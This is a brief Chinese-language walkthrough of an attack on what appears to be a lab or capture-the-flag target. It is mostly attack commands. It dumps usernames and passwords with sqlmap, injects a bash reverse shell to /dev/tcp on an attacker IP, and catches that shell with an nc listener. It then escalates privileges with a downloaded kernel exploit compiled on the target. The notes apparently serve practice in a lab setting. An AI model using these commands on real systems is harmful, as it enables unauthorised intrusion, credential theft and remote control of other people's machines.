目标IP:192.168.11.176
端口开放情况:
先从80端口入手
- 使用抓包--爆破 暂不使用
- 测试注入
- 目录扫描
使用post传值,我们抓包后放到sqlmap中测试
添加*号优先测试
sqlmap -r q.txt --level 5 --risk 3
逐步跑出用户名和密码
sqlmap -r q.txt --level 5 --risk 3 -D webapp -T users -C "username,password" --dump
然后就是很明显命令注入
在框内输入| bash -i >& /dev/tcp/192.168.11.177/1234 0>&1
使用nc 监听1234端口
开始提权
- sudo -l 需要密码
- lsb_release
4.5版本的Centos 搜索一下提权脚本
根据提示
直接传到靶机中gcc编译后运行就可以
/var/mail/root